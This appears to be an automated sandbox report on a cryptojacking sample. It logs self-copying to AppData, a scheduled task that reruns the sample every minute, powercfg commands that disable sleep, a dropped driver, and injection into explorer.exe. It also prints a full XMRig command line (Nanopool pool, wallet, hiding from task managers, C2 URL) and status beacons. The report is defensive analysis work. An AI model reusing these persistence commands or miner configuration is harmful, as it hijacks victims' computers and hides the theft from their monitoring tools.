              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: ft1i6jvAdD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: ft1i6jvAdD.exe Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: ft1i6jvAdD.exe Static file information: File size 5227008 > 1048576
              Source: ft1i6jvAdD.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4fba00
              Source: ft1i6jvAdD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp
              Source: ghghghg.exe.0.dr Static PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe Code function: 0_2_00007FFE167F1A82 push esi; ret 0_2_00007FFE167F1A88
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Code function: 57_2_00007FFE18993760 pushad ; ret 57_2_00007FFE18993761
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Code function: 57_2_00007FFE1899257B pushad ; ret 57_2_00007FFE1899257F
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Code function: 57_2_00007FFE1899376F pushad ; ret 57_2_00007FFE18993779
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Code function: 57_2_00007FFE18993745 pushad ; ret 57_2_00007FFE18993746
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Code function: 57_2_00007FFE18994152 pushad ; ret 57_2_00007FFE18994154

              Persistence and Installation Behavior

              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe File created: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys
              Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe File created: C:\Users\user\AppData\Local\Temp\ghghghg.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe File created: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sys

              Boot Survival

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.000000000320E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
              Source: explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELLL
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEXE
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10300 --USER="49PXA5CU5H8JNB4X6ADM7VGFK4E8Z11JB9AJXCFBC69WRZXFPJGNJFKFZLTKM5W33FK3Y1ZYVJFJCEDEL5PDUNZP1EPMXHX" --PASS="" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="HAACZRNYAVRJ.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=1 --CINIT-IDLEXPLORER.EXE
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHA
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHPTMSNNPRPBVNFZOKR
              Source: explorer.exe, 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
              Source: explorer.exe, 00000011.00000002.4801808070.000000000320E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEITY\SYSTEM;V
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10300 --USER="49PXA5CU5H8JNB4X6ADM7VGFK4E8Z11JB9AJXCFBC69WRZXFPJGNJFKFZLTKM5W33FK3Y1ZYVJFJCEDEL5PDUNZP1EPMXHX" --PASS="" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="HAACZRNYAVRJ.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=1 --CINIT-IDLEXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10300--USER=49PXA5CU5H8JNB4X6ADM7VGFK4E8Z11JB9AJXCFBC69WRZXFPJGNJFKFZLTKM5W33FK3Y1ZYVJFJCEDEL5PDUNZP1EPMXHX--PASS=--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=HAACZRNYAVRJ.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=80--CINIT-ID=TMSNNPRPBVNFZOKRV
              Source: explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe Memory allocated: F30000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe Memory allocated: 1AE00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 2970000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 1AA70000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 3160000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 1B1D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 11B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 1AC30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 16C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Memory allocated: 1B1A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysJump to dropped file
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe TID: 7088Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6756Thread sleep count: 98 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 6752Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 2900Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 7056Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.00000000013E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Memory written: PID: 4112 base: 140000000 value: 4D
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Memory written: PID: 4112 base: 140001000 value: NU
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Memory written: PID: 4112 base: 140674000 value: DF
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Memory written: PID: 4112 base: 140847000 value: 00
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Memory written: PID: 4112 base: 1146010 value: 00
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Thread register set: target process: 4112
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: unknown unknown
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}bus\
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}
              Source: explorer.exe, 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Windows\explorer.exe - Program Manager
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 68325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":2,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":0.0,"status":6}
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}}
              Source: explorer.exe, 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerxmr-eu1.nanopool.org49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager`
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":2,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":0.0,"status":6}
